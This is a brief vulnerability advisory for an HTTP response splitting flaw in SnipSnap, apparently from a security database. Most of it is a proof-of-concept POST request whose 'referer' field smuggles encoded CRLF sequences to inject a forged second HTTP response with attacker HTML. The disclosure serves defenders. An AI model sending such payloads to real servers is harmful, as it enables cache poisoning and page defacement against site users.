|
|
SnipSnap HTTP Response Splitting Vulnerability
The following proof of concept example is available: POST /exec/authenticate HTTP/1.0 Host: www.example.com Content-Type: application/x-www-form-urlencoded Content-length: 197 referer=abc%0d%0aConnection:%20keep-alive%0d%0aContent-Length:%200%0d%0a%0d% 0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:20%0d% 0a%0d%0a<html>0wned!!</html>&cancel=cancel |
|
Privacy Statement |